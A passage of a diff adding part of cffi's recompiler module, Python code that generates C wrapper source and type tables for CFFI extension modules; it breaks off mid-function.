prnt('PyMODINIT_FUNC') + prnt('init%s(void)' % (base_module_name,)) + prnt('{') + prnt(' _cffi_init("%s", 0x%x, &_cffi_type_context);' % ( + self.module_name, self._version)) + prnt('}') + prnt('#endif') + prnt() + prnt('#ifdef __GNUC__') + prnt('# pragma GCC visibility pop') + prnt('#endif') + self._version = None + + def _to_py(self, x): + if isinstance(x, str): + return "b'%s'" % (x,) + if isinstance(x, (list, tuple)): + rep = [self._to_py(item) for item in x] + if len(rep) == 1: + rep.append('') + return "(%s)" % (','.join(rep),) + return x.as_python_expr() # Py2: unicode unexpected; Py3: bytes unexp. + + def write_py_source_to_f(self, f): + self._f = f + prnt = self._prnt + # + # header + prnt("# auto-generated file") + prnt("import _cffi_backend") + # + # the 'import' of the included ffis + num_includes = len(self.ffi._included_ffis or ()) + for i in range(num_includes): + ffi_to_include = self.ffi._included_ffis[i] + try: + included_module_name, included_source = ( + ffi_to_include._assigned_source[:2]) + except AttributeError: + raise VerificationError( + "ffi object %r includes %r, but the latter has not " + "been prepared with set_source()" % ( + self.ffi, ffi_to_include,)) + if included_source is not None: + raise VerificationError( + "not implemented yet: ffi.include() of a C-based " + "ffi inside a Python-based ffi") + prnt('from %s import ffi as _ffi%d' % (included_module_name, i)) + prnt() + prnt("ffi = _cffi_backend.FFI('%s'," % (self.module_name,)) + prnt(" _version = 0x%x," % (self._version,)) + self._version = None + # + # the '_types' keyword argument + self.cffi_types = tuple(self.cffi_types) # don't change any more + types_lst = [op.as_python_bytes() for op in self.cffi_types] + prnt(' _types = %s,' % (self._to_py(''.join(types_lst)),)) + typeindex2type = dict([(i, tp) for (tp, i) in self._typesdict.items()]) + # + # the keyword arguments from ALL_STEPS + for step_name in self.ALL_STEPS: + lst = self._lsts[step_name] + if len(lst) > 0 and step_name != "field": + prnt(' _%ss = %s,' % (step_name, self._to_py(lst))) + # + # the '_includes' keyword argument + if num_includes > 0: + prnt(' _includes = (%s,),' % ( + ', '.join(['_ffi%d' % i for i in range(num_includes)]),)) + # + # the footer + prnt(')') + + # ---------- + + def _gettypenum(self, type): + # a KeyError here is a bug. please report it! 
:-) + return self._typesdict[type] + + def _convert_funcarg_to_c(self, tp, fromvar, tovar, errcode): + extraarg = '' + if isinstance(tp, model.BasePrimitiveType) and not tp.is_complex_type(): + if tp.is_integer_type() and tp.name != '_Bool': + converter = '_cffi_to_c_int' + extraarg = ', %s' % tp.name + elif isinstance(tp, model.UnknownFloatType): + # don't check with is_float_type(): it may be a 'long + # double' here, and _cffi_to_c_double would lose precision + converter = '(%s)_cffi_to_c_double' % (tp.get_c_name(''),) + else: + cname = tp.get_c_name('') + converter = '(%s)_cffi_to_c_%s' % (cname, + tp.name.replace(' ', '_')) + if cname in ('char16_t', 'char32_t'): + self.needs_version(VERSION_CHAR16CHAR32) + errvalue = '-1' + # + elif isinstance(tp, model.PointerType): + self._convert_funcarg_to_c_ptr_or_array(tp, fromvar, + tovar, errcode) + return + # + elif (isinstance(tp, model.StructOrUnionOrEnum) or + isinstance(tp, model.BasePrimitiveType)): + # a struct (not a struct pointer) as a function argument; + # or, a complex (the same code works) + self._prnt(' if (_cffi_to_c((char *)&%s, _cffi_type(%d), %s) < 0)' + % (tovar, self._gettypenum(tp), fromvar)) + self._prnt(' %s;' % errcode) + return + # + elif isinstance(tp, model.FunctionPtrType): + converter = '(%s)_cffi_to_c_pointer' % tp.get_c_name('') + extraarg = ', _cffi_type(%d)' % self._gettypenum(tp) + errvalue = 'NULL' + # + else: + raise NotImplementedError(tp) + # + self._prnt(' %s = %s(%s%s);' % (tovar, converter, fromvar, extraarg)) + self._prnt(' if (%s == (%s)%s && PyErr_Occurred())' % ( + tovar, tp.get_c_name(''), errvalue)) + self._prnt(' %s;' % errcode) + + def _extra_local_variables(self, tp, localvars, freelines): + if isinstance(tp, model.PointerType): + localvars.add('Py_ssize_t datasize') + localvars.add('struct _cffi_freeme_s *large_args_free = NULL') + freelines.add('if (large_args_free != NULL)' + ' _cffi_free_array_arguments(large_args_free);') + + def _convert_funcarg_to_c_ptr_or_array(self, tp, fromvar, tovar, errcode): + self._prnt(' datasize = _cffi_prepare_pointer_call_argument(') + self._prnt(' _cffi_type(%d), %s, (char **)&%s);' % ( + self._gettypenum(tp), fromvar, tovar)) + self._prnt(' if (datasize != 0) {') + self._prnt(' %s = ((size_t)datasize) <= 640 ? 
' + '(%s)alloca((size_t)datasize) : NULL;' % ( + tovar, tp.get_c_name(''))) + self._prnt(' if (_cffi_convert_array_argument(_cffi_type(%d), %s, ' + '(char **)&%s,' % (self._gettypenum(tp), fromvar, tovar)) + self._prnt(' datasize, &large_args_free) < 0)') + self._prnt(' %s;' % errcode) + self._prnt(' }') + + def _convert_expr_from_c(self, tp, var, context): + if isinstance(tp, model.BasePrimitiveType): + if tp.is_integer_type() and tp.name != '_Bool': + return '_cffi_from_c_int(%s, %s)' % (var, tp.name) + elif isinstance(tp, model.UnknownFloatType): + return '_cffi_from_c_double(%s)' % (var,) + elif tp.name != 'long double' and not tp.is_complex_type(): + cname = tp.name.replace(' ', '_') + if cname in ('char16_t', 'char32_t'): + self.needs_version(VERSION_CHAR16CHAR32) + return '_cffi_from_c_%s(%s)' % (cname, var) + else: + return '_cffi_from_c_deref((char *)&%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + elif isinstance(tp, (model.PointerType, model.FunctionPtrType)): + return '_cffi_from_c_pointer((char *)%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + elif isinstance(tp, model.ArrayType): + return '_cffi_from_c_pointer((char *)%s, _cffi_type(%d))' % ( + var, self._gettypenum(model.PointerType(tp.item))) + elif isinstance(tp, model.StructOrUnion): + if tp.fldnames is None: + raise TypeError("'%s' is used as %s, but is opaque" % ( + tp._get_c_name(), context)) + return '_cffi_from_c_struct((char *)&%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + elif isinstance(tp, model.EnumType): + return '_cffi_from_c_deref((char *)&%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + else: + raise NotImplementedError(tp) + + # ---------- + # typedefs + + def _typedef_type(self, tp, name): + return self._global_type(tp, "(*(%s *)0)" % (name,)) + + def _generate_cpy_typedef_collecttype(self, tp, name): + self._do_collect_type(self._typedef_type(tp, name)) + + def _generate_cpy_typedef_decl(self, tp, name): + pass + + def _typedef_ctx(self, tp, name): + type_index = self._typesdict[tp] + self._lsts["typename"].append(TypenameExpr(name, type_index)) + + def _generate_cpy_typedef_ctx(self, tp, name): + tp = self._typedef_type(tp, name) + self._typedef_ctx(tp, name) + if getattr(tp, "origin", None) == "unknown_type": + self._struct_ctx(tp, tp.name, approxname=None) + elif isinstance(tp, model.NamedPointerType): + self._struct_ctx(tp.totype, tp.totype.name, approxname=tp.name, + named_ptr=tp) + + # ---------- + # function declarations + + def _generate_cpy_function_collecttype(self, tp, name): + self._do_collect_type(tp.as_raw_function()) + if tp.ellipsis and not self.target_is_python: + self._do_collect_type(tp) + + def _generate_cpy_function_decl(self, tp, name): + assert not self.target_is_python + assert isinstance(tp, model.FunctionPtrType) + if tp.ellipsis: + # cannot support vararg functions better than this: check for its + # exact type (including the fixed arguments), and build it as a + # constant function pointer (no CPython wrapper) + self._generate_cpy_constant_decl(tp, name) + return + prnt = self._prnt + numargs = len(tp.args) + if numargs == 0: + argname = 'noarg' + elif numargs == 1: + argname = 'arg0' + else: + argname = 'args' + # + # ------------------------------ + # the 'd' version of the function, only for addressof(lib, 'func') + arguments = [] + call_arguments = [] + context = 'argument of %s' % name + for i, type in enumerate(tp.args): + arguments.append(type.get_c_name(' x%d' % i, context)) + call_arguments.append('x%d' % i) + repr_arguments = ', 
'.join(arguments) + repr_arguments = repr_arguments or 'void' + if tp.abi: + abi = tp.abi + ' ' + else: + abi = '' + name_and_arguments = '%s_cffi_d_%s(%s)' % (abi, name, repr_arguments) + prnt('static %s' % (tp.result.get_c_name(name_and_arguments),)) + prnt('{') + call_arguments = ', '.join(call_arguments) + result_code = 'return ' + if isinstance(tp.result, model.VoidType): + result_code = '' + prnt(' %s%s(%s);' % (result_code, name, call_arguments)) + prnt('}') + # + prnt('#ifndef PYPY_VERSION') # ------------------------------ + # + prnt('static PyObject *') + prnt('_cffi_f_%s(PyObject *self, PyObject *%s)' % (name, argname)) + prnt('{') + # + context = 'argument of %s' % name + for i, type in enumerate(tp.args): + arg = type.get_c_name(' x%d' % i, context) + prnt(' %s;' % arg) + # + localvars = set() + freelines = set() + for type in tp.args: + self._extra_local_variables(type, localvars, freelines) + for decl in sorted(localvars): + prnt(' %s;' % (decl,)) + # + if not isinstance(tp.result, model.VoidType): + result_code = 'result = ' + context = 'result of %s' % name + result_decl = ' %s;' % tp.result.get_c_name(' result', context) + prnt(result_decl) + prnt(' PyObject *pyresult;') + else: + result_decl = None + result_code = '' + # + if len(tp.args) > 1: + rng = range(len(tp.args)) + for i in rng: + prnt(' PyObject *arg%d;' % i) + prnt() + prnt(' if (!PyArg_UnpackTuple(args, "%s", %d, %d, %s))' % ( + name, len(rng), len(rng), + ', '.join(['&arg%d' % i for i in rng]))) + prnt(' return NULL;') + prnt() + # + for i, type in enumerate(tp.args): + self._convert_funcarg_to_c(type, 'arg%d' % i, 'x%d' % i, + 'return NULL') + prnt() + # + prnt(' Py_BEGIN_ALLOW_THREADS') + prnt(' _cffi_restore_errno();') + call_arguments = ['x%d' % i for i in range(len(tp.args))] + call_arguments = ', '.join(call_arguments) + prnt(' { %s%s(%s); }' % (result_code, name, call_arguments)) + prnt(' _cffi_save_errno();') + prnt(' Py_END_ALLOW_THREADS') + prnt() + # + prnt(' (void)self; /* unused */') + if numargs == 0: + prnt(' (void)noarg; /* unused */') + if result_code: + prnt(' pyresult = %s;' % + self._convert_expr_from_c(tp.result, 'result', 'result type')) + for freeline in freelines: + prnt(' ' + freeline) + prnt(' return pyresult;') + else: + for freeline in freelines: + prnt(' ' + freeline) + prnt(' Py_INCREF(Py_None);') + prnt(' return Py_None;') + prnt('}') + # + prnt('#else') # ------------------------------ + # + # the PyPy version: need to replace struct/union arguments with + # pointers, and if the result is a struct/union, insert a first + # arg that is a pointer to the result. We also do that for + # complex args and return type. 
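+ # Illustrative sketch (hypothetical cdef, added here for clarity):
+ # given 'struct pt { int x, y; }; struct pt shift(struct pt);', the
+ # branch below would emit a redirection helper roughly like
+ # static void _cffi_f_shift(struct pt *result, struct pt *x0)
+ # { { *result = shift(*x0); } }
+ # i.e. struct/union (and complex) values travel through pointers,
+ # and a struct result becomes a leading out-pointer argument.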
+ def need_indirection(type): + return (isinstance(type, model.StructOrUnion) or + (isinstance(type, model.PrimitiveType) and + type.is_complex_type())) + difference = False + arguments = [] + call_arguments = [] + context = 'argument of %s' % name + for i, type in enumerate(tp.args): + indirection = '' + if need_indirection(type): + indirection = '*' + difference = True + arg = type.get_c_name(' %sx%d' % (indirection, i), context) + arguments.append(arg) + call_arguments.append('%sx%d' % (indirection, i)) + tp_result = tp.result + if need_indirection(tp_result): + context = 'result of %s' % name + arg = tp_result.get_c_name(' *result', context) + arguments.insert(0, arg) + tp_result = model.void_type + result_decl = None + result_code = '*result = ' + difference = True + if difference: + repr_arguments = ', '.join(arguments) + repr_arguments = repr_arguments or 'void' + name_and_arguments = '%s_cffi_f_%s(%s)' % (abi, name, + repr_arguments) + prnt('static %s' % (tp_result.get_c_name(name_and_arguments),)) + prnt('{') + if result_decl: + prnt(result_decl) + call_arguments = ', '.join(call_arguments) + prnt(' { %s%s(%s); }' % (result_code, name, call_arguments)) + if result_decl: + prnt(' return result;') + prnt('}') + else: + prnt('# define _cffi_f_%s _cffi_d_%s' % (name, name)) + # + prnt('#endif') # ------------------------------ + prnt() + + def _generate_cpy_function_ctx(self, tp, name): + if tp.ellipsis and not self.target_is_python: + self._generate_cpy_constant_ctx(tp, name) + return + type_index = self._typesdict[tp.as_raw_function()] + numargs = len(tp.args) + if self.target_is_python: + meth_kind = OP_DLOPEN_FUNC + elif numargs == 0: + meth_kind = OP_CPYTHON_BLTN_N # 'METH_NOARGS' + elif numargs == 1: + meth_kind = OP_CPYTHON_BLTN_O # 'METH_O' + else: + meth_kind = OP_CPYTHON_BLTN_V # 'METH_VARARGS' + self._lsts["global"].append( + GlobalExpr(name, '_cffi_f_%s' % name, + CffiOp(meth_kind, type_index), + size='_cffi_d_%s' % name)) + + # ---------- + # named structs or unions + + def _field_type(self, tp_struct, field_name, tp_field): + if isinstance(tp_field, model.ArrayType): + actual_length = tp_field.length + if actual_length == '...': + ptr_struct_name = tp_struct.get_c_name('*') + actual_length = '_cffi_array_len(((%s)0)->%s)' % ( + ptr_struct_name, field_name) + tp_item = self._field_type(tp_struct, '%s[0]' % field_name, + tp_field.item) + tp_field = model.ArrayType(tp_item, actual_length) + return tp_field + + def _struct_collecttype(self, tp): + self._do_collect_type(tp) + if self.target_is_python: + # also requires nested anon struct/unions in ABI mode, recursively + for fldtype in tp.anonymous_struct_fields(): + self._struct_collecttype(fldtype) + + def _struct_decl(self, tp, cname, approxname): + if tp.fldtypes is None: + return + prnt = self._prnt + checkfuncname = '_cffi_checkfld_%s' % (approxname,) + prnt('_CFFI_UNUSED_FN') + prnt('static void %s(%s *p)' % (checkfuncname, cname)) + prnt('{') + prnt(' /* only to generate compile-time warnings or errors */') + prnt(' (void)p;') + for fname, ftype, fbitsize, fqual in self._enum_fields(tp): + try: + if ftype.is_integer_type() or fbitsize >= 0: + # accept all integers, but complain on float or double + if fname != '': + prnt(" (void)((p->%s) | 0); /* check that '%s.%s' is " + "an integer */" % (fname, cname, fname)) + continue + # only accept exactly the type declared, except that '[]' + # is interpreted as a '*' and so will match any array length. + # (It would also match '*', but that's harder to detect...) 
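+ # Illustrative sketch (hypothetical field, added for clarity): for a
+ # field declared as 'double d;' in the cdef, the loop below emits
+ # roughly
+ # { double *tmp = &p->d; (void)tmp; }
+ # so a mismatched declaration fails at C compile time instead of
+ # misbehaving at runtime.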
+ while (isinstance(ftype, model.ArrayType) + and (ftype.length is None or ftype.length == '...')): + ftype = ftype.item + fname = fname + '[0]' + prnt(' { %s = &p->%s; (void)tmp; }' % ( + ftype.get_c_name('*tmp', 'field %r'%fname, quals=fqual), + fname)) + except VerificationError as e: + prnt(' /* %s */' % str(e)) # cannot verify it, ignore + prnt('}') + prnt('struct _cffi_align_%s { char x; %s y; };' % (approxname, cname)) + prnt() + + def _struct_ctx(self, tp, cname, approxname, named_ptr=None): + type_index = self._typesdict[tp] + reason_for_not_expanding = None + flags = [] + if isinstance(tp, model.UnionType): + flags.append("_CFFI_F_UNION") + if tp.fldtypes is None: + flags.append("_CFFI_F_OPAQUE") + reason_for_not_expanding = "opaque" + if (tp not in self.ffi._parser._included_declarations and + (named_ptr is None or + named_ptr not in self.ffi._parser._included_declarations)): + if tp.fldtypes is None: + pass # opaque + elif tp.partial or any(tp.anonymous_struct_fields()): + pass # field layout obtained silently from the C compiler + else: + flags.append("_CFFI_F_CHECK_FIELDS") + if tp.packed: + if tp.packed > 1: + raise NotImplementedError( + "%r is declared with 'pack=%r'; only 0 or 1 are " + "supported in API mode (try to use \"...;\", which " + "does not require a 'pack' declaration)" % + (tp, tp.packed)) + flags.append("_CFFI_F_PACKED") + else: + flags.append("_CFFI_F_EXTERNAL") + reason_for_not_expanding = "external" + flags = '|'.join(flags) or '0' + c_fields = [] + if reason_for_not_expanding is None: + enumfields = list(self._enum_fields(tp)) + for fldname, fldtype, fbitsize, fqual in enumfields: + fldtype = self._field_type(tp, fldname, fldtype) + self._check_not_opaque(fldtype, + "field '%s.%s'" % (tp.name, fldname)) + # cname is None for _add_missing_struct_unions() only + op = OP_NOOP + if fbitsize >= 0: + op = OP_BITFIELD + size = '%d /* bits */' % fbitsize + elif cname is None or ( + isinstance(fldtype, model.ArrayType) and + fldtype.length is None): + size = '(size_t)-1' + else: + size = 'sizeof(((%s)0)->%s)' % ( + tp.get_c_name('*') if named_ptr is None + else named_ptr.name, + fldname) + if cname is None or fbitsize >= 0: + offset = '(size_t)-1' + elif named_ptr is not None: + offset = '((char *)&((%s)0)->%s) - (char *)0' % ( + named_ptr.name, fldname) + else: + offset = 'offsetof(%s, %s)' % (tp.get_c_name(''), fldname) + c_fields.append( + FieldExpr(fldname, offset, size, fbitsize, + CffiOp(op, self._typesdict[fldtype]))) + first_field_index = len(self._lsts["field"]) + self._lsts["field"].extend(c_fields) + # + if cname is None: # unknown name, for _add_missing_struct_unions + size = '(size_t)-2' + align = -2 + comment = "unnamed" + else: + if named_ptr is not None: + size = 'sizeof(*(%s)0)' % (named_ptr.name,) + align = '-1 /* unknown alignment */' + else: + size = 'sizeof(%s)' % (cname,) + align = 'offsetof(struct _cffi_align_%s, y)' % (approxname,) + comment = None + else: + size = '(size_t)-1' + align = -1 + first_field_index = -1 + comment = reason_for_not_expanding + self._lsts["struct_union"].append( + StructUnionExpr(tp.name, type_index, flags, size, align, comment, + first_field_index, c_fields)) + self._seen_struct_unions.add(tp) + + def _check_not_opaque(self, tp, location): + while isinstance(tp, model.ArrayType): + tp = tp.item + if isinstance(tp, model.StructOrUnion) and tp.fldtypes is None: + raise TypeError( + "%s is of an opaque type (not declared in cdef())" % location) + + def _add_missing_struct_unions(self): + # not very nice, but some 
struct declarations might be missing + # because they don't have any known C name. Check that they are + # not partial (we can't complete or verify them!) and emit them + # anonymously. + lst = list(self._struct_unions.items()) + lst.sort(key=lambda tp_order: tp_order[1]) + for tp, order in lst: + if tp not in self._seen_struct_unions: + if tp.partial: + raise NotImplementedError("internal inconsistency: %r is " + "partial but was not seen at " + "this point" % (tp,)) + if tp.name.startswith('$') and tp.name[1:].isdigit(): + approxname = tp.name[1:] + elif tp.name == '_IO_FILE' and tp.forcename == 'FILE': + approxname = 'FILE' + self._typedef_ctx(tp, 'FILE') + else: + raise NotImplementedError("internal inconsistency: %r" % + (tp,)) + self._struct_ctx(tp, None, approxname) + + def _generate_cpy_struct_collecttype(self, tp, name): + self._struct_collecttype(tp) + _generate_cpy_union_collecttype = _generate_cpy_struct_collecttype + + def _struct_names(self, tp): + cname = tp.get_c_name('') + if ' ' in cname: + return cname, cname.replace(' ', '_') + else: + return cname, '_' + cname + + def _generate_cpy_struct_decl(self, tp, name): + self._struct_decl(tp, *self._struct_names(tp)) + _generate_cpy_union_decl = _generate_cpy_struct_decl + + def _generate_cpy_struct_ctx(self, tp, name): + self._struct_ctx(tp, *self._struct_names(tp)) + _generate_cpy_union_ctx = _generate_cpy_struct_ctx + + # ---------- + # 'anonymous' declarations. These are produced for anonymous structs + # or unions; the 'name' is obtained by a typedef. + + def _generate_cpy_anonymous_collecttype(self, tp, name): + if isinstance(tp, model.EnumType): + self._generate_cpy_enum_collecttype(tp, name) + else: + self._struct_collecttype(tp) + + def _generate_cpy_anonymous_decl(self, tp, name): + if isinstance(tp, model.EnumType): + self._generate_cpy_enum_decl(tp) + else: + self._struct_decl(tp, name, 'typedef_' + name) + + def _generate_cpy_anonymous_ctx(self, tp, name): + if isinstance(tp, model.EnumType): + self._enum_ctx(tp, name) + else: + self._struct_ctx(tp, name, 'typedef_' + name) + + # ---------- + # constants, declared with "static const ..." 
+ + def _generate_cpy_const(self, is_int, name, tp=None, category='const', + check_value=None): + if (category, name) in self._seen_constants: + raise VerificationError( + "duplicate declaration of %s '%s'" % (category, name)) + self._seen_constants.add((category, name)) + # + prnt = self._prnt + funcname = '_cffi_%s_%s' % (category, name) + if is_int: + prnt('static int %s(unsigned long long *o)' % funcname) + prnt('{') + prnt(' int n = (%s) <= 0;' % (name,)) + prnt(' *o = (unsigned long long)((%s) | 0);' + ' /* check that %s is an integer */' % (name, name)) + if check_value is not None: + if check_value > 0: + check_value = '%dU' % (check_value,) + prnt(' if (!_cffi_check_int(*o, n, %s))' % (check_value,)) + prnt(' n |= 2;') + prnt(' return n;') + prnt('}') + else: + assert check_value is None + prnt('static void %s(char *o)' % funcname) + prnt('{') + prnt(' *(%s)o = %s;' % (tp.get_c_name('*'), name)) + prnt('}') + prnt() + + def _generate_cpy_constant_collecttype(self, tp, name): + is_int = tp.is_integer_type() + if not is_int or self.target_is_python: + self._do_collect_type(tp) + + def _generate_cpy_constant_decl(self, tp, name): + is_int = tp.is_integer_type() + self._generate_cpy_const(is_int, name, tp) + + def _generate_cpy_constant_ctx(self, tp, name): + if not self.target_is_python and tp.is_integer_type(): + type_op = CffiOp(OP_CONSTANT_INT, -1) + else: + if self.target_is_python: + const_kind = OP_DLOPEN_CONST + else: + const_kind = OP_CONSTANT + type_index = self._typesdict[tp] + type_op = CffiOp(const_kind, type_index) + self._lsts["global"].append( + GlobalExpr(name, '_cffi_const_%s' % name, type_op)) + + # ---------- + # enums + + def _generate_cpy_enum_collecttype(self, tp, name): + self._do_collect_type(tp) + + def _generate_cpy_enum_decl(self, tp, name=None): + for enumerator in tp.enumerators: + self._generate_cpy_const(True, enumerator) + + def _enum_ctx(self, tp, cname): + type_index = self._typesdict[tp] + type_op = CffiOp(OP_ENUM, -1) + if self.target_is_python: + tp.check_not_partial() + for enumerator, enumvalue in zip(tp.enumerators, tp.enumvalues): + self._lsts["global"].append( + GlobalExpr(enumerator, '_cffi_const_%s' % enumerator, type_op, + check_value=enumvalue)) + # + if cname is not None and '$' not in cname and not self.target_is_python: + size = "sizeof(%s)" % cname + signed = "((%s)-1) <= 0" % cname + else: + basetp = tp.build_baseinttype(self.ffi, []) + size = self.ffi.sizeof(basetp) + signed = int(int(self.ffi.cast(basetp, -1)) < 0) + allenums = ",".join(tp.enumerators) + self._lsts["enum"].append( + EnumExpr(tp.name, type_index, size, signed, allenums)) + + def _generate_cpy_enum_ctx(self, tp, name): + self._enum_ctx(tp, tp._get_c_name()) + + # ---------- + # macros: for now only for integers + + def _generate_cpy_macro_collecttype(self, tp, name): + pass + + def _generate_cpy_macro_decl(self, tp, name): + if tp == '...': + check_value = None + else: + check_value = tp # an integer + self._generate_cpy_const(True, name, check_value=check_value) + + def _generate_cpy_macro_ctx(self, tp, name): + if tp == '...': + if self.target_is_python: + raise VerificationError( + "cannot use the syntax '...' in '#define %s ...' 
when " + "using the ABI mode" % (name,)) + check_value = None + else: + check_value = tp # an integer + type_op = CffiOp(OP_CONSTANT_INT, -1) + self._lsts["global"].append( + GlobalExpr(name, '_cffi_const_%s' % name, type_op, + check_value=check_value)) + + # ---------- + # global variables + + def _global_type(self, tp, global_name): + if isinstance(tp, model.ArrayType): + actual_length = tp.length + if actual_length == '...': + actual_length = '_cffi_array_len(%s)' % (global_name,) + tp_item = self._global_type(tp.item, '%s[0]' % global_name) + tp = model.ArrayType(tp_item, actual_length) + return tp + + def _generate_cpy_variable_collecttype(self, tp, name): + self._do_collect_type(self._global_type(tp, name)) + + def _generate_cpy_variable_decl(self, tp, name): + prnt = self._prnt + tp = self._global_type(tp, name) + if isinstance(tp, model.ArrayType) and tp.length is None: + tp = tp.item + ampersand = '' + else: + ampersand = '&' + # This code assumes that casts from "tp *" to "void *" is a + # no-op, i.e. a function that returns a "tp *" can be called + # as if it returned a "void *". This should be generally true + # on any modern machine. The only exception to that rule (on + # uncommon architectures, and as far as I can tell) might be + # if 'tp' were a function type, but that is not possible here. + # (If 'tp' is a function _pointer_ type, then casts from "fn_t + # **" to "void *" are again no-ops, as far as I can tell.) + decl = '*_cffi_var_%s(void)' % (name,) + prnt('static ' + tp.get_c_name(decl, quals=self._current_quals)) + prnt('{') + prnt(' return %s(%s);' % (ampersand, name)) + prnt('}') + prnt() + + def _generate_cpy_variable_ctx(self, tp, name): + tp = self._global_type(tp, name) + type_index = self._typesdict[tp] + if self.target_is_python: + op = OP_GLOBAL_VAR + else: + op = OP_GLOBAL_VAR_F + self._lsts["global"].append( + GlobalExpr(name, '_cffi_var_%s' % name, CffiOp(op, type_index))) + + # ---------- + # extern "Python" + + def _generate_cpy_extern_python_collecttype(self, tp, name): + assert isinstance(tp, model.FunctionPtrType) + self._do_collect_type(tp) + _generate_cpy_dllexport_python_collecttype = \ + _generate_cpy_extern_python_plus_c_collecttype = \ + _generate_cpy_extern_python_collecttype + + def _extern_python_decl(self, tp, name, tag_and_space): + prnt = self._prnt + if isinstance(tp.result, model.VoidType): + size_of_result = '0' + else: + context = 'result of %s' % name + size_of_result = '(int)sizeof(%s)' % ( + tp.result.get_c_name('', context),) + prnt('static struct _cffi_externpy_s _cffi_externpy__%s =' % name) + prnt(' { "%s.%s", %s, 0, 0 };' % ( + self.module_name, name, size_of_result)) + prnt() + # + arguments = [] + context = 'argument of %s' % name + for i, type in enumerate(tp.args): + arg = type.get_c_name(' a%d' % i, context) + arguments.append(arg) + # + repr_arguments = ', '.join(arguments) + repr_arguments = repr_arguments or 'void' + name_and_arguments = '%s(%s)' % (name, repr_arguments) + if tp.abi == "__stdcall": + name_and_arguments = '_cffi_stdcall ' + name_and_arguments + # + def may_need_128_bits(tp): + return (isinstance(tp, model.PrimitiveType) and + tp.name == 'long double') + # + size_of_a = max(len(tp.args)*8, 8) + if may_need_128_bits(tp.result): + size_of_a = max(size_of_a, 16) + if isinstance(tp.result, model.StructOrUnion): + size_of_a = 'sizeof(%s) > %d ? 
sizeof(%s) : %d' % ( + tp.result.get_c_name(''), size_of_a, + tp.result.get_c_name(''), size_of_a) + prnt('%s%s' % (tag_and_space, tp.result.get_c_name(name_and_arguments))) + prnt('{') + prnt(' char a[%s];' % size_of_a) + prnt(' char *p = a;') + for i, type in enumerate(tp.args): + arg = 'a%d' % i + if (isinstance(type, model.StructOrUnion) or + may_need_128_bits(type)): + arg = '&' + arg + type = model.PointerType(type) + prnt(' *(%s)(p + %d) = %s;' % (type.get_c_name('*'), i*8, arg)) + prnt(' _cffi_call_python(&_cffi_externpy__%s, p);' % name) + if not isinstance(tp.result, model.VoidType): + prnt(' return *(%s)p;' % (tp.result.get_c_name('*'),)) + prnt('}') + prnt() + self._num_externpy += 1 + + def _generate_cpy_extern_python_decl(self, tp, name): + self._extern_python_decl(tp, name, 'static ') + + def _generate_cpy_dllexport_python_decl(self, tp, name): + self._extern_python_decl(tp, name, 'CFFI_DLLEXPORT ') + + def _generate_cpy_extern_python_plus_c_decl(self, tp, name): + self._extern_python_decl(tp, name, '') + + def _generate_cpy_extern_python_ctx(self, tp, name): + if self.target_is_python: + raise VerificationError( + "cannot use 'extern \"Python\"' in the ABI mode") + if tp.ellipsis: + raise NotImplementedError("a vararg function is extern \"Python\"") + type_index = self._typesdict[tp] + type_op = CffiOp(OP_EXTERN_PYTHON, type_index) + self._lsts["global"].append( + GlobalExpr(name, '&_cffi_externpy__%s' % name, type_op, name)) + + _generate_cpy_dllexport_python_ctx = \ + _generate_cpy_extern_python_plus_c_ctx = \ + _generate_cpy_extern_python_ctx + + def _print_string_literal_in_array(self, s): + prnt = self._prnt + prnt('// # NB. this is not a string because of a size limit in MSVC') + if not isinstance(s, bytes): # unicode + s = s.encode('utf-8') # -> bytes + else: + s.decode('utf-8') # got bytes, check for valid utf-8 + try: + s.decode('ascii') + except UnicodeDecodeError: + s = b'# -*- encoding: utf8 -*-\n' + s + for line in s.splitlines(True): + comment = line + if type('//') is bytes: # python2 + line = map(ord, line) # make a list of integers + else: # python3 + # type(line) is bytes, which enumerates like a list of integers + comment = ascii(comment)[1:-1] + prnt(('// ' + comment).rstrip()) + printed_line = '' + for c in line: + if len(printed_line) >= 76: + prnt(printed_line) + printed_line = '' + printed_line += '%d,' % (c,) + prnt(printed_line) + + # ---------- + # emitting the opcodes for individual types + + def _emit_bytecode_VoidType(self, tp, index): + self.cffi_types[index] = CffiOp(OP_PRIMITIVE, PRIM_VOID) + + def _emit_bytecode_PrimitiveType(self, tp, index): + prim_index = PRIMITIVE_TO_INDEX[tp.name] + self.cffi_types[index] = CffiOp(OP_PRIMITIVE, prim_index) + + def _emit_bytecode_UnknownIntegerType(self, tp, index): + s = ('_cffi_prim_int(sizeof(%s), (\n' + ' ((%s)-1) | 0 /* check that %s is an integer type */\n' + ' ) <= 0)' % (tp.name, tp.name, tp.name)) + self.cffi_types[index] = CffiOp(OP_PRIMITIVE, s) + + def _emit_bytecode_UnknownFloatType(self, tp, index): + s = ('_cffi_prim_float(sizeof(%s) *\n' + ' (((%s)1) / 2) * 2 /* integer => 0, float => 1 */\n' + ' )' % (tp.name, tp.name)) + self.cffi_types[index] = CffiOp(OP_PRIMITIVE, s) + + def _emit_bytecode_RawFunctionType(self, tp, index): + self.cffi_types[index] = CffiOp(OP_FUNCTION, self._typesdict[tp.result]) + index += 1 + for tp1 in tp.args: + realindex = self._typesdict[tp1] + if index != realindex: + if isinstance(tp1, model.PrimitiveType): + self._emit_bytecode_PrimitiveType(tp1, index) + 
else: + self.cffi_types[index] = CffiOp(OP_NOOP, realindex) + index += 1 + flags = int(tp.ellipsis) + if tp.abi is not None: + if tp.abi == '__stdcall': + flags |= 2 + else: + raise NotImplementedError("abi=%r" % (tp.abi,)) + self.cffi_types[index] = CffiOp(OP_FUNCTION_END, flags) + + def _emit_bytecode_PointerType(self, tp, index): + self.cffi_types[index] = CffiOp(OP_POINTER, self._typesdict[tp.totype]) + + _emit_bytecode_ConstPointerType = _emit_bytecode_PointerType + _emit_bytecode_NamedPointerType = _emit_bytecode_PointerType + + def _emit_bytecode_FunctionPtrType(self, tp, index): + raw = tp.as_raw_function() + self.cffi_types[index] = CffiOp(OP_POINTER, self._typesdict[raw]) + + def _emit_bytecode_ArrayType(self, tp, index): + item_index = self._typesdict[tp.item] + if tp.length is None: + self.cffi_types[index] = CffiOp(OP_OPEN_ARRAY, item_index) + elif tp.length == '...': + raise VerificationError( + "type %s badly placed: the '...' array length can only be " + "used on global arrays or on fields of structures" % ( + str(tp).replace('/*...*/', '...'),)) + else: + assert self.cffi_types[index + 1] == 'LEN' + 